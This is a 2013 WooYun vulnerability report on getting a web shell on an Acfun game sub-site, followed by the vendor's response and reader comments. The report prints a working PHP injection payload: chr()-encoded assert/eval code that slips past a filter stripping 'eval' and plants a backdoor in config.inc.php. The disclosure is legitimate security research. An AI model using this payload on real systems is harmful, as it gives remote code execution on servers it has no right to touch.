当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021269

漏洞标题:Acfun某分站getshell

相关厂商:杭州游趣网络有限公司

漏洞作者: N1ghtBird

提交时间:2013-04-05 19:30

修复时间:2013-04-07 23:53

公开时间:2013-04-07 23:53

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-05: 细节已通知厂商并且等待厂商处理中
2013-04-06: 厂商已经确认,细节仅向厂商公开
2013-04-07: 厂商提前公开漏洞,细节向公众公开

简要描述:

某分站下程序设计缺陷拿shell.
感谢xsser、核总、憶楓三位大牛的指点= 3 =

详细说明:

1.jpg


2.jpg


会直接写入config.inc.php:

$bbsurl = 'http://www.acfun.tv/';
$gameurl = 'http://dts.acfun.tv/';
$homepage = 'http://www.amarilloviridian.com/';


代码过滤了eval和引号

function setconfig($string) {
  if(!get_magic_quotes_gpc()) {
    $string = str_replace('\'', '\\\'', $string);
  } else {
    $string = str_replace('\"', '"', $string);
  }
  return $string;
}
function astrfilter($str) {
  if(is_array($str)) {
    foreach($str as $key => $val) {
      $str[$key] = astrfilter($val);
    }
  } else {
    $str = str_replace(Array('eval'),'',$str);    
  }
  return $str;
}


变型代码:

';assert(chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(71).chr(69).chr(84).chr(91).chr(39).chr(97).chr(39).chr(93).chr(41));//


3.jpg


写入config文件分两步, 第一步加入如上代码后文件内容为:

$homepage = 'http://www.amarilloviridian.com/\';assert(chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(71).chr(69).chr(84).chr(91).chr(39).chr(97).chr(39).chr(93).chr(41));//';      // game homepage


代码被包含进$homepage了,不过不要紧。再次提交原内容:

4.jpg


http://www.amarilloviridian.com/


侧漏之后的内容:

$homepage = 'http://www.amarilloviridian.com/';assert(chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(71).chr(69).chr(84).chr(91).chr(39).chr(97).chr(39).chr(93).chr(41));//';      // game homepage


漏洞证明:

因为A站的dts构造代码的时候写错导致服务器500,这里用同版本dts程序的daobee服做例子

5.jpg


修复方案:

过滤啦...

版权声明:转载请注明来源 N1ghtBird@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2013-04-06 18:33

厂商回复:

已确认,通知大逃杀作者处理。大逃杀未托管在我们服务器上,正在等候反馈。

最新状态:

2013-04-07:已经确认并通知dts修复

漏洞评价:

评论

  1. 2013-04-05 19:34 | 残影小L ( 路人 | Rank:12 漏洞数:3 | 我还是我。)

    AC......V5,不是说这俩站都有入侵检测的么。。。

  2. 2013-04-05 23:52 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    这个可以!

  3. 2013-04-06 08:19 | superwbd ( 路人 | Rank:15 漏洞数:6 | 一个不懂技术的黑客。。。)

    据说4.1那天不是弄了各种黑科技吗。。。

  4. 2013-04-06 17:58 | N1ghtBird ( 普通白帽子 | Rank:104 漏洞数:21 | _(:з」∠)_)

    @残影小L 有...猴子通过几个基友找到我了23333

  5. 2013-04-06 21:31 | N1ghtBird ( 普通白帽子 | Rank:104 漏洞数:21 | _(:з」∠)_)

    @杭州游趣网络有限公司 亲..getshell了只有7rank? 比xss还低?

  6. 2013-04-06 21:35 | 杭州游趣网络有限公司(乌云厂商)

    @N1ghtBird 确认复述情况的时候发现触发本漏洞需要本身为大逃杀管理员。也许我们对大逃杀系统和架构不太了解。一旦得知修复完成我们会在第一时间公开。

  7. 2013-04-06 21:38 | 杭州游趣网络有限公司(乌云厂商)

    @残影小L 大逃杀系统没有入侵检测系统,托管于第三方服务器。旗下公司仅北京机房具有入侵检测系统,并且此系统对内不对外,仅对机房内网中有害信息进行端口镜像检查,对危害国家安全和色情信息进行及时的阻断,并非常见的对付外网入侵的IDS系统。

  8. 2013-04-06 21:43 | 杭州游趣网络有限公司(乌云厂商)

    @N1ghtBird 触发本漏洞需要本身为大逃杀管理员,故危害不算很大。不过查看服务器日志,你是从wiki摸过去的?

  9. 2013-04-06 22:14 | N1ghtBird ( 普通白帽子 | Rank:104 漏洞数:21 | _(:з」∠)_)

    @杭州游趣网络有限公司 社工的,我没碰过WIKI,据说之前有人留过后门..所以是非之地不要去

  10. 2013-04-06 22:15 | N1ghtBird ( 普通白帽子 | Rank:104 漏洞数:21 | _(:з」∠)_)

    @杭州游趣网络有限公司 还有wiki那个3306今天通知猴子修了.基本上没其他问题了

  11. 2013-04-08 09:12 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    公开好快

  12. 2013-04-08 10:12 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    感觉中国人喜欢自己干不了的事还要死抗,难道这就是挑战么?

  13. 2013-04-08 10:57 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    洞主拿shell前怎么看到源码的?config.inc.php

  14. 2013-04-08 10:58 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @N1ghtBird 会直接写入config.inc.php:$bbsurl = 'http://www.acfun.tv/';$gameurl = 'http://dts.acfun.tv/';$homepage = 'http://www.amarilloviridian.com/';这部分内容怎么知道的?洞主在测试前就知道这个配置文件是这样的了?

  15. 2013-04-08 11:20 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)

    洞主下载到源码了???

  16. 2013-04-08 13:39 | N1ghtBird ( 普通白帽子 | Rank:104 漏洞数:21 | _(:з」∠)_)

    @Enjoy_Hacking @wefgod @Passer_by googlecode开源

  17. 2013-04-08 14:56 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @N1ghtBird 原来如此!

  18. 2013-04-13 12:03 | 残影小L ( 路人 | Rank:12 漏洞数:3 | 我还是我。)

    @杭州游趣网络有限公司 谢谢解释 - -